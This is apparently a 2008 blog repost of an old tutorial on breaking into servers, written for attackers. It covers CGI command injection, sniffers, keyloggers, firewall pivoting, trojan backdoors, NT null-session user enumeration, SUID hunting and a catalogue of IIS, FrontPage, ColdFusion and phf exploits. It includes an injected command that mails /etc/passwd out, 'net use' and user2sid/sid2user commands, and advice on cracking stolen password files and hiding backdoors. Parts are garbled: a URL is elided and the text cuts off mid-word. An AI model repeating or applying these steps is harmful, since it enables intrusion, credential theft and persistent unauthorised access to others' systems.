CGI (Common Gateway Interface) is a method used to make web pages more interactive. For example. You visit your account at Hotmail. You type your username and password into the text boxes, and click ‘enter.’ The hotmail computer then reads what you typed, and runs a script (which could be in a variety of programming or scripting languages) that logs you into your account. That’s CGI. Anytime you interface with the website (such as search engines) you are using CGI. CGI adds lots of functionality, and lots of security issues. There are currently all kinds of know CGI exploitations. Two old ones are http://www.someserver.com/cgi-bin/phf and http://www.someserver.com/cgi-bin/cenzurat. If the file in question (/cgi-bin/cenzurat) exists, and you request it, you will get a box up. In the box, type:
root ; mail E-mail < /etc/passwd. What this does when the computer runs the script is issue the command:
cenzurat (whatever you type in the box). The ; operator starts a new command, which in this case is displaying the password file on your browser. Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at The CyberUnderground) or use on a web site such as CyberArmy.com or infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special ‘CGI executable directories’. These include /cgi-bin/ (UNIX), /cg-win/, and /cgi-dos/ (windows machines). The HTTP daemon knows to execute any file requested in those directories. Normally, when you type www.someserver.com/index.html, all that is happening is the daemon sends you a copy of index.html. If you type www.someserver.com/cgi-bin/program, the daemon will actually run program, if it exists. The output of this process is usually exported to HTML format and sent to your computer. You as a hacker could exploit this, though, by running programs of your own on the remote machine (if, say, you had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web server is vulnerable (ie: has a CGI file somewhere on it that can be used to gain access), you can do a number of things. Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use their built in CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers and use a browser to scan for them manually. Doing things yourself, rather than using canned hacker tools, always provides better results along with expanding your own knowledge.

Sniffiing and Keylogging
Oftentimes you’ll need to break into not-so-interesting computers to get to your ultimate goal. If you are trying to break into your target network’s webserver (www.yourgarget.com), and while trying, found a vulnerability in their mail server (mail.yourtarget.com), you have a few options on how to get into the webserver from the mailserver. If you install a sniffer (available at many hacker sites), it will look at all data passing it on the network for passwords and the like. It will copy and store that information in a file for you to periodically check. Sniffing (which is considered an eleet hacker tactic), if done correctly, almost always provides results. Another option is installing a keylogger on the mailserver. Any keystrokes entered on that computer are kept in a log file. Periodically check the file, and you’ll usually come up with a password to something else interesting. Be careful though. If you don’t hide your sniffers or keyloggers well, you stand a good chance of getting busted, or at least losing any access you had.

Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They look at your IP address, and determine if it should allow you in or not. Usually, this is a router (a piece of hardware used to connect different networks) that has a list of IP addresses to accept. If yours is not in that list, it will reject your connection. It’s a good bet that this list contains mostly machines inside that network, or from a few other trusted networks. Oftentimes router firewalls let connections pass from other computers in the same subnet. Lets pretend you are 203.22.54.77. You want to get into admin.somecorp.com (34.14.91.15), which is behind the firewall. Www.somecorp.com is (like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to admin, chances are you wont even get a login prompt, just a ‘connection failed’ message. But if you telnet to www, then to admin, your IP address is that of www’s – 34.14.91.3. Which is in the same subnet of admin, and will most likely be accepted in. And there you have your login prompt at admon.somecorp.com. This is conceptually hacking around a firewall. To break right through, well, you’d better be elite. Fortunately for you, there’s a ‘Firewall Penetration’ section near the end of this text.

Trojans
Don’t assume that once you have access (be it a rootshell or just user or guest access) to a computer, you always will. One good way to increase your chances of keeping access to this computer is to put in a back door of some kind. The easiest (and arguably most helpful to a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds of OS’s. The three most popular are Back Orifice, SubSeven, and Netbus. All three are for Windows boxes (try RootKit for a UNIX Trojan). BO by itself is commandline, but GUI’s (Graphical User Interfaces) are available for it. BO has a server (that you install on your target) and a client program (that you use at home to control your target). With it, you can browse and manipulate data and directories on your target. You can send message boxes to the computer to scare people on it. NetBus, on the other hand, has more functions than BO (like screenshots of your victim, opening and closing the CD-ROM, etc), but doesn’t hide itself quite as well as BO. NetBus, like BO, has a client and a server. Though Trojans are extremely fun to scare sysadmins, if you want to keep your access to the box, you should only use it as a backdoor.

Port Hacking
If you can’t find any exploits for the daemon you’ve found, that doesn’t mean its not vulnerable. Theoretically, every daemon bound to a TCP port is vulnerable to be used an access point to the computers insides. Telnet to the port, and interact with the daemon. At the top of your telnet window is the word ‘Telnet.’ As soon as it says ‘Telnet – www.yourtarget.com‘ (or some IP address) you are connected, have established a session, whether you see text or not. Send control characters (control-x, control-c, etc). Type commands like, GET, GO, START, LOGON, INIT, START, etc. If what you type doesn’t show up on the screen, that means that the daemon isn’t echoing your characters back to you – turn on your local echo so you can see what you are typing.
For example: the HTTP GET command I explained earlier. You can do this manually – telnet to port 80, issue a GET command with the page you want to view, hit enter twice, and the HTML will pour across the screen. You are doing manually what Netscape, Internet Explorer, and Lynx do for you (except, browsers parse the HTML into readable text). Any client program that communicates with a server program on some port is just issuing various commands to the daemon based on how the user interacts with the client interface. Some times, an initialization command needs to be issued before the daemon will talk to you. Try anything you can think of. Also, it helps to know what types of programs are bound to the port you are hacking. Refer to Appendix D on well known ports at the end of this text.
One last note on this topic. Sometimes, sysadmins, authorized users, and even other hackers will bind a daemon to some extremely high port number as a back door. Casual portscans will miss these, unless they are set to scan to high numbers. If you see port 12345 or 31337 open on some computer, someone was here before you – these are the defaults used by the Netbus and Back Orifice Trojans. Also, lazy system administrators sometimes put daemons on high port numbers that let them telnet in without a password.

NT: The SID
In an NT environment, every user, group, and domain has a unique numeric value that represents it. If you change the name of a particular group, this number the SID (Security IDentifyer) stays the same, so the group’s properties remain unchanged. And with a valid connection to an NT box, you can use the SID to find valid login names for that machine (if you have a connection to the PDC you’ll get login names for the whole domain). You’ll do this with the infamous user2sid and sid2user tools, available at www.hackingexposed.com. Getting every username is invaluable for Brute Forcing – put the names you find into a text file and use NAT, Legion 2.1, or Brutus to take care of the rest. The first step, though, is connecting to the box in question. Use the Net View command – if you don’t have a login name, the null IPC session technique will usually work (net use \\ip_add\ipc$ “” /user:”". Once you get a ‘command was completed successfully’ for any net use command, you’re connected, and can use the sid tools to get every username. (The reason this works is because the LookupAccountName and LookupAccountSid Win32 system calls can be called by anyone with ‘Everyone’ access – including someone with a null IPC session.) Lets say you null IPC’d 38.100.200.1. You want to find members of the group ‘Domain Users,’ which is essentially everyone (this woks only if 38.100.100.1 is a domain controller – Domain Users doesn’t exist on non DC’s). You’d type this at a command prompt:

C:\toolz>user2sid \\38.100.100.1 “domain users”

Which would give you that group’s SID. Pretend you get:

S-1-5-7464736-37373837-513

We are interested in the last three digits of the SID: 513. These last digits are the RID. The RID is the only number that will be different for every other user and group SID. Meaning every other SID in this domain will start with:

S-1-5-7464736-37373837

And a different 3 digit RID exists for every group and user. We now know that “domain users” RID is 513. The Administrator account is always RID 500. To verify that, we’ll do this:

C:\toolz>sid2user S-1-5-7-464736-37373837-500
User Admini

There – it told us the user for that SID. Only this sysadmin thinks he’s slick by changing the Administrator account to Admini. Heh. Now, do the sid2user account to ever RID from 501 until you get an error saying “no such SID”. So next you’d:

C:\toolz>sid2user S-1-5-7-464736-37373837-501
User asmith

And so forth. If you’re connected to a non domain controller (member server), you’ll get every user for that box. If it’s a DC, you’ll get every global user – that is every user associated with the domain itself, not an individual computer. Now you have a list of login names to BF.

UNIX: SUID Binaries
This is a biggie for any aspiring UNIX hacker. You get access to a UNIX box, and want root. You’re first step should be the password file. If its protected (you don’t have access to it), next you’d look for common vulnerabilities – and local exploits for them. Check the System Exploit section below for common ones. If you don’t see any at first glance, that doesn’t mean there are no vulnerable filez. Daemons aren’t the only programs vulnerable to buffer overflows. Any binary (executable) might be vulnerable. These binaries have access privileges of their own – just like a user. They can be denied or accepted access to other resources just like a user can. All users and binaries have UID’s (User ID’s) and GID’s (Group ID’s) – and the lower the better (root being zero). Binaries with low privileges (high number UID’s) will often be denied when they try to access other files. Binaries with higher privileges (lower UID’s) will have more access. So naturally we want to sploit a binary with root – equivalent privileges, or perms (permissions). Binaries with Superuser User ID’s – SUID perms. And with one command-line you can find every SUID binary on the system:

$ find / -type f -perm -04000 -ls

The output of this command will give you every binary with SUID perms, or root privileges. The list will probably be pretty big. Go to a Exploit archive with a searchable database (Rootshell or SecurityFocus) and look up every SUID binary you found. Chances are one will be vulnerable – get the code, run it, and you’ll have root.

Peering through the Eyes of your Enemy
Hacking pits you against a system. This system, be it a huge inter-network or just one computer, is nothing by itself. Servers don’t run and secure themselves. An administrator, or sysadmin, runs them. Hacking into his box is going head-to-head with the sysadmin. So how do you gain the competitive edge? You need to see the playing field from his point of view.
There will come times when the prewritten exploits don’t work on your target system, and brute force either didn’t work or is too unstealthy for a hacker as leet as you. What do you do? Well, suppose the server you’re trying to crack is a Netscape Enterprise Server. Install Enterprise Server on your machine. By doing this, you’ll get a number of valuable pieces of info.
· Default Directory Structures – where you can find stuff
· Default Passwords – worth a try
· Out-of-the-box scripts – CGI stuph that you could exploit
If you’re serious about hacking a system, you (usually) are better armed knowing about it. And the more the better. Most server software will have a free evaluation version. Otherwise check the warez pages.
No matter what server you’re hacking, you definitely want some kind of UNIX partition and an NT partition. Get RedHat, SuSE, or Caldera LinUX (most versions are around $30) and play with it. Set up an account with no privileges. Download exploits (remote and local) and try to get root on your own box. Then do the same with NT. Try the getadmin and iishack exploits. Once you have a feel for how these more common xploits work, you’ll be better at using them against a real target.

System Exploits
You target a network. Scan ports on every machine, telnet to every open port to find out what service is running, and look up every service at every exploit archive. Within a few hours, you’ll have a list of at least a few vulnerabilities, meaning a couple of ways in. Remember: in every network there is always at least one insecure computer. And from that box you can hack the rest of the network without much trouble (using local exploits and passwords stolen from the first system you hacked). Here, again, is a list of places to go to look for exploits. If you find info on one exploit somewhere, still check the others for better or updated info.

· www.rootshell.com
· www.securityfocus.com
· www.ntbugtraq.com
· www.insecure.org
· www.anticode.com
· www.infilsec.com/vulnerabilities
· www.xforce.iss.net
· www.hoobie.net/security/exploits
· www.net-space.org/lsv-archive/bugtraq.html
· home.cyberarmy.com/tcu

Here I will go over specific vulnerabilities to look for in any system you’re trying to hack. For more info on each of these, visit the exploit archives above. Most give either an explanation on how to exploit the security bug, or offer code that will do it for you.

MS Front Page ASP Dot and ASP Alternate Data Stream Vulnerabilities (remote)
These exploits effect FrontPage version 3. Any ASP file (the NT equivalent to UNIX .cgi files) is viewable to a hacker, by just appending a dot to the end (eg: request somefile.asp like this: somefile.asp.). ASP code oftentimes contains local file references and even usernames and passwords).
Another way to view ASP code is to append the string ::$DATA to the URL. Eg: somefile.asp::$DATA. If the server you’re targeting is patched against the dot vulnerability, try this one.

IIS Remote Buffer Overflow Vulnerability (remote)
A lot of IIS Webservers (IIS is the webserver that comes with NT) are vulnerable to this exploit. Using the exploit code iishack.asm (assembly) or iishack.exe (win32 binary) you can force the IIS web daemon to download and run any file on the Net you specify – including ncx or netbus. The code is available at www.technotronic.com and www.eeye.com.

IIS RDS Vulnerability (remote)
A lot of IIS Servers are also vulnerable to this attack. If the server has Remote Data Service enabled (including msadc.dll – which many do) you can run the exploit code from your home computer and send commands to the server. Copy \winnt\system32\repair\sam._ to \inetpub\wwwroot\ and download the SAM hive. The exploit code is available at rootshell and securityfocus.

WebSitePro Vulnerabilities (remote)
Out of the box, WebSitePro for NT has a few vulnerabilities. The CGI file uploader.exe allows anyone to upload files. Check for it in /cgi-win/, /cgi-dos/, /cgi-bin/, or /cgi-shl/. Also, any files you upload into any of these directories can be executed (by just requesting them with your browser). Can you say Netbus?

NT Getadmin Exploit (local)
The executable exploits getadmin.exe and sechole.exe will make any user of the machine members of the Administrators and Domain Admins groups. If you hack into an NT box with a user account that doesn’t have a whole lot of permissions, use one of these exploits. They’re available at anticode.

NT RAS Buffer Overrun (local)
This local exploit exploits rasman.exe into spawning a rootshell (command prompt with system privelages). The exploit code and more info is available at www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.

Winhlp32 Buffer Overrun (local)
Using the exploit code, a hacker can run a batch file with system privileges. Put rdisk /s in the batch file to dump the SAM onto the hard disk. Exploit code and an explanation at www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.

Cold Fusion Vulnerabilities (remote)
Cold Fusion has its own scripting language for CGI. These scripts are .cfm files. The /cfdocs/expeval/openfile.cfm file allows you to upload any file to the server. The problem is, the /cfdocs/expeval/exprcalc.cfm file (the script used to view the file you uploaded) deletes the file after you view it. Openfile.cfm exists to help you debug a cfm file of your own. The vulnerability: exprcalc.cfm can be manipulated to delete itself – which will keep it from deleting files you upload. L0pht’s website along with SecurityFocus has a cfm script you can upload (called mole.cfm) that gives you full access to the server.

Apache PHF and cenzurat Vulnerabilities
These are two very old vulnerabilities, but still exist on some servers, and are worth mentioning. Apache (a popular Linux webserver) stores its CGI scripts in /cgi-bin/ (which is common). If /cgi-bin/phf exists, you can enter the following URL:
http://www.abouttobehacked.com/cgi-bin/ … etc/passwd
And you will have the /etc/passwd file cat-ed (displayed) in your browser. Crack it with John the Ripper and you’re in. If /cgi-bin/cenzurat exists, you can use the text box on this page to cenzurat the box. If you enter ‘root’ in the box, a shell will execute ‘cenzurat root’ on the UNIX box. So if you type ‘root ; /bin/mail E-mail < /etc/passwd’ the shell will execute ‘cenzurat root ; mail E-mail < /etc/passwd’. A semico

---

Possibly related posts: (automatically generated)

• Hacking wind0wz NT
• * How To Break Into Computer Systems – Part 3
• How to find someone’s password for Hotmail, Yahoo, and a bunch of others.
• Hacking into an Oracle database

~ by empa7hy on July 14, 2008.